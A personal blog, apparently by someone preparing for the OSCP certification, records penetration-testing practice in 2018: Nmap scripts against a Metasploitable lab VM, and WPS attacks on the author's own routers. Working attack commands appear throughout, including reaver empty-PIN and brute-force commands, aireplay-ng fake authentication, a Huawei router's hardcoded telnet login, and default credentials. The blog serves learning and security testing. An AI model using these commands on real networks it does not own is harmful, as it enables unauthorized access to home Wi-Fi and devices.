Thursday, 27 December 2018

OSCP Qualified

Three months 10 hrs / day finally paid off. Half a year ago I would not even dream of this success but with persistence my efforts were rewarded. Results came in this morning and I have never been happier.

Friday, 27 July 2018

I have been very busy...

Have not posted for over a month but that is due to the fact that I have gotten quite engaged with my current hobby. I have found a new group of fellow nerds to share my knowledge with and I could not be happier. I can finally speak the same language, be on the same page, share ideas and they will understand what I am talking about. It feels less... lonely.

I have been going though virtual machines, starting with metasploitable and dissecting every vulnerable service running on the machine without the use of metasploit and documenting my progress (I will share my work soon). It is not because I am unfamiliar with the tool, but it is because this tool will have limited usage on the OSCP exam.

Yes, I have signed up for the PWK (pentesting with Kali) course to do my OSCP qualification in the near future. I have considered my options between CEH and others but I have felt like only hands on experience I can get from OSCP is what will give me personally the highest value or bang for the buck.
I fully understand that it is a big area to delve into but I have set my mind on the subject and I feel like this is it! The motto of the course also resonates with my life philosophy: TRY HARDER! Am I in for a ride ;-). Wish me luck.

Sunday, 24 June 2018

I did it wrong!

I did it wrong! 

 

I did it wrong!

 

There you go I said it! You hear me right. I have learnt something new over the last weekend and my current knowledge on information gathering had to be updated and build upon. I am saying this because I have just appreciated how powerful, flexible and detailed this wonderful tool called Nmap can be. I also felt like I have reached a dead end due to not expanding the attack surface of my dear target - metasploitable. Thank god, Nmap came along! Previous default scan returned only 23 open ports, whilest when you specify -p - all 65535 of the TCP ports we got 30!:



If you delve deeper into it's capabilities you wouldn't need a vulnerability scanner. I am talking about the scripting engine that can be employed to return a very detailed report about a remote service running on the target machine. 
And by detailed I mean using 590 default scripts contained in the NMAP database, not to mentioned community scripts and the ones you can write yourself! The deafult path to the scripts in Kali Linux is in /usr/share/nmap/scripts/ feel free to browse and check the reference to these scipts either by running --script-help (name of the script) or on nmap website. They can be easily deployed using --script (name) one at a time , by category :
  • auth
  • broadcast
  • brute
  • default
  • discovery
  • dos
  • exploit
  • external
  • fuzzer
  • intrusive
  • malware
  • safe
  • version
  • vuln 
or by copying your desired scripts to the folder and specifying folder path when launching nmap --scipt /path/to/the/scripts/. How cool is that! Of course, with great power comes great responsibility (which I love as you noticed on this blog) and care needs to be taken when launching those scripts as some of them are more intrusive than others, for eg. brute category would lauch brute force attack on various services using provided password and user list. Naturally that would raise a lot of red flags on the target you would like to pentest, so use with caution!

 Result of assesing ftp : nmap 192.168.1.107 -p 21 -sV -vvv --script *ftp-* -oG meta_Ubuntu_ftp

Result of assessing ssh: nmap 192.168.1.107 -p 22 -sV -vvv --script ssh-* -oG meta_Ubuntu_ftp*

From above reports we can additionally learn that ftp except using anonymous logins to the server also provides an options with logging in using two additional accounts: msfadmin:msfadmin and user:user that also work for the SSH server. CVE reference as well as vulnerability check on VSFTP has been performed, reference given it and also tried to use this exploit to gain root shell and it has succeeded, giving us the
|     Exploit results:
|       Shell command: id
|       Results: uid=0(root) gid=0(root)
How cool is that!!!

Points learnt:
1) When assessing the target always use port range -p - to scan all 65535 TCP ports and UDP ports when needed. Default Nmap scan uses 1000 common ports and may not return more unique ones that can provide a gate for an extra attack vector.
2) Scan technique: one can append few --scripts categories to do a thorough scan of the target machine to return a detailed report but that can easily get easily out of hand and information might be overwhelming at first. My preference is to do an open port scan first using default -sS scan to get a list of open ports, append the search to -oX in order to parse the scan to Metasploit and then focus my Nmap scans on one at a time to fine tune my results and gather more information about each and every port.
3) Automated scanners can be hit and miss. What a like about Nmap most is that before a scan can begin you can fine tune your scan type by using a range of switches in order either to: evade IPS, IDS or a firewall. Make you scan more stealthy, run it though for eg. proxychain to hide your scan origin, or adjust TCP flags to find a best way of "knocking" on the ports. For eg. I have noticed Windows system wont respond to ping scans therefore it is necessary to adjust accordingly.

Thursday, 7 June 2018

Part 3 Fun with WPS - "NULL" Pin attack vector.

So far we have learnt that there are at two potential attack vectors on WPS - PBC (Push button connect) that can yield successful reveal of WiFi password. However, another router enthusiast who started looking at firmware embedded in HG658C found out that manufacturer has given an option to connect to the router using ..... an empty pin.

Connected to 192.168.1.1.
Escape character is '^]'.
-------------------------------
-----Welcome to ATP Cli------
-------------------------------
Login: !!Huawei
Password:
ATP>sh
BusyBox vv1.9.1 (2014-02-08 20:26:13 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# nvram show  | grep wps_device_pin  
size: 2659 bytes (30109 left)
wps_device_pin=

 
I would love to know the reason behind this implementation, was it conscious ? Did they know that programmers building the firmware allowed this hole to persist, has nobody checked the possible implications ?

Since routers are build from parts coming from different manufacturers it is a good idea to look at specific WiFi chip to see if correlation with other router manufacturers can be made in order to cross-reference the vulnerability.  HG658C uses Broadcom BCM63168 SOC and above researcher has demonstrated that if one could send an empty PIN for eg. with reaver v. 1.6b or above using command:

reaver -i wlanXmon -b xx:xx:xx:xx:xx:xx -p "" -N
where: -i wlanXmon - describes wireless interface in monitor mode
-b mac address of the Access Point
-p "" empty pin inside quotation marks
-N no-nacks - helps to accomplish that feat successfully

the PSK (pre shared network key) would be provided in less than a minute of work!


 

So far I have found out that affected BCM63168 is implemented in at least 29 known routers/devices but if this venerability can be applied to those ones as well remains to be tested. 

Others reported successfull breaches on HUAWEI version of BT Home Hub 3.0B running BCM6361 adding potentially 12 more different routers to the list and EE-Smart-Hub from Arcadyan Corporation running on atheros chipset - sadly I could not locate the chipset model itself therefore I am still waiting to cross-reference it with other brands.






Pin cracked in 3 sec! My new personal record - after weeks of learning, boy was it worth it!

Monday, 4 June 2018

Productive weekend - TCP/IP



Over the last weekend I started exploring TCP/IP suite and its protocols (set of rules defining the behavior). What I have learnt was the fact of how much is going on behind establishing simple SSH connection or sending an email. As you can see within this flow of communication - there can be many potential attack vectors to interrupt, intercept or see the context  of  "conversation" taking place. (I will keep updating the diagram as my knowledge grows)




Tuesday, 22 May 2018

Part 2 Fun with WPS! - Brute force

Somebody said that amongst security, convenience and price you can pick only two of them. If you choose sec+conv you will have to pay a high price for a product like that. Naturally when you choose a product that is both convenient to use and cheap that's where the vulnerabilities happen. The price you pay is that one of exposing yourself to a breach.. of trust, privacy, identity ?

You have to make a choice of what you value in life - somebody wise once said, sadly we are not versed enough in technology to see how it connects with our values. Maybe we do not place an emphasis on our values any more, because if we did would we would pay more attention to securing them in the first place ? Have we allowed ourself to outsource this responsibility to some other, omnipotent entity that we believe will do better job than we can ? Those questions I have in my mind as I test the security of the few routers that I own.

I have put myself in the shoes of your average consumer who is delighted to use the convenience of using WPS (Wireless Protected Setup) where he at the push of a button can evade this huge, painful, daunting inconvenience of entering an 8 digit alphanumeric password into their devices to connect to the network once in a lifetime! I guess we really are lazy, if we asked for a feature like WPS. Very convenient, sure.... secure, mmmm not so much.

Whilst the first attack on aforementioned EX2700 was an offline PixieWPS appraoch this on is slightly louder. Welcome to...



The tool to test the robustness of wireless network is Reaver, available on Kali Linux as a part of the package. Came to life in 2011 by Craig Heffner and Stefan Viehböck  (link to his research) uses a brute forcing method to retrieve the PIN from WPS enabled routers. This PIN allows the devices to connect to the network at a push of the button and is essentially a key that allows attackers to retrieve the WIFI password and connect freely, regardless of the complexity of the password itself.

Many thought that Reaver, since it's old age has been "forgotten", "dead" or "shit" as its default configuration won't do the magic. Sadly those people do not understand the fact, that, just like any tool, say a lock-pick, requires practice, practice, practice and a correct use of switches that come as a part of this tool (reaver -h). What is more, reaver is still going strong and being developed. New version 1.65 was released just 11 days ago (from the day of this post) and has got many interesting features. Those guys, developing the tool are smart, and would not carry on with the subject if they have not seen a potential in it. Besides, old routers still exist in there, some new ones are built on outdated chips to save money, and new vulnerabilities in routers are being discovered every day.

Without further ado, let's get the magic. Essence of "interacting" with invisible WiFi waves is employing a wireless adapter capable of being both in monitor and promiscuous mode - the last one allows to intercept, add or inject "frames" into a wireless stream of data and modify it within the vicinity of the card, which is about 20 meters (depending on the wireless antenna, adapter strength etc).

In order to use reaver successfully on a wireless point we are trying to retrieve our golden pin, aircrack-ng suite tells us that:


The lack of association with the access point is the single biggest reason why injection fails.

To associate with an access point, use fake authentication:

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Where:

  • -1 means fake authentication
  • 0 reassociation timing in seconds
  • -e teddy is the wireless network name
  • -a 00:14:6C:7E:40:80 is the access point MAC address
  • -h 00:09:5B:EC:EE:F2 is our card MAC address
  • ath0 is the wireless interface name
This simple command allows us to act as one of the devices connected to the network and in consequence modify the frames coming and going from the access point. Many people overlook that advice which results in reaver giving:

Warning: Receive timeout occurred. When sending EAPOL start request. It would look infinitely loop without any response from the router we are trying to talk to. Even though reaver includes this option as a default during start:

reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv
some routers need more personalized treatment:
aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Where:

  • 6000 - Reauthenticate very 6000 seconds. The long period also causes keep alive packets to be sent.
  • -o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs.
  • -q 10 - Send keep alive packets every 10 seconds 

See what I mean by practice? And it is not to mention the delay switches that adjust the behaviour of the router in order to prevent lockouts, AP rate limiting and other challenges.

Reaver in action. 5.49% done after few hours, 20 seconds per pin. We just need a large cup of tea and lot's of patience! Now we wait.

 

Sunday, 20 May 2018

Part 1 Fun with WPS - PixieDust attack





I have been gifted this Netgear EX2700 customer appliance that is designed to act as a wireless extender to your wireless network. Its primary use is to extend the signal range to cover any WiFi dead spots in your house, naturally.  It works in a bridged mode alongside with your wireless router.

" wireless range extender takes an existing signal from a wireless router or wireless access point and rebroadcasts it to create a second network. When two or more hosts have to be connected with one another over the IEEE 802.11 protocol and the distance is too long for a direct connection to be established, a wireless repeater is used to bridge the gap." wikipedia

This model comes with MediaTek MT7620A chipset, has been released to the market in July 2014, produced by Mediatek in partnership with Ralink ( acquired by Mediatek  in 2011).


EX2700, still sold by Netgear under the product line of "Essentials", is essentially a backdoor if WPS is enabled and the software not updated - a convenient entry point to a home network, that intruders can exploit. Due to vulnerability of its WiFi SoC chipset MediaTek MT7620A that controls the behaviour of the device itself, the attacker can obtain WPS Pin to the EX2700 in a matter of minutes and in consequence retrieve PSK password to the network. More on this later....







"A system on a chip or system on chip (SoC or SOC) is an integrated circuit (also known as an "IC" or "chip") that integrates all components of a computer or other electronic systems. These components typically include a central processing unit (CPU), memory, input/output ports and secondary storage – all on a single substrate. It may contain digital, analog, mixed-signal, and often radio-frequency functions, depending on the application. SoCs are very common in the mobile computing market because of their low power consumption"

Think Raspberry Pi!

Vulnerability!

This device, amongst many, many others ( https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit#gid=2048815923 ) when used with WPS functionality is susceptible to a Pixie Dust attack - an offline, brute forcing method that captures E-S1 and E-S2 messages during WPS exchange. PixieDust gets that information from M3 message.


Link to a research from 2014 by Dominique Bongard

 

This attack in most cases is possible due to low entropy - an algorithm responsible for generating a supposedly "random" E-S1 and E-S2 numbers used to secure the whole process. In EX2700, situation is less secure as those numbers do not seem to be generated at all, they are all equal 0. This overlook in the design of the WPS exchange results on an instant recovery of the router PIN.


PixieWPS cracking the PIN in less than a minute.